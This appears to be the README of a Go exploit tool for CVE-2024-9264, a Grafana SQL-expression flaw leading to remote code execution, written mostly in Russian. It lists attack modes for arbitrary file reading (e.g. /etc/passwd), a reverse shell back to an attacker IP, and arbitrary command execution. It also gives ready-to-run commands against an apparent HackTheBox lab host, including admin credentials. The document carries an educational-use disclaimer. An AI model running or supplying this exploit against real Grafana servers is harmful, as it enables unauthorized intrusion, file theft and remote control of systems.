
A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x.
Инструмент эксплуатации для CVE-2024-9264, критической уязвимости в Grafana, позволяющей аутентифицированному злоумышленнику выполнить SQL-запрос, ведущий к RCE.
🛡️ Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение.
Несанкционированное использование незаконно и неэтично.
CVE-2024-9264 — это критический недостаток в Grafana, позволяющий аутентифицированному злоумышленнику выполнять SQL-команды, что приводит к RCE и чтению файлов.
file – Чтение произвольных файлов (например, /etc/passwd)shell – Обратная оболочка на машину атакующегоcommand – Выполнение произвольных команд оболочки (например, whoami)
Не все аргументы обязательны.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]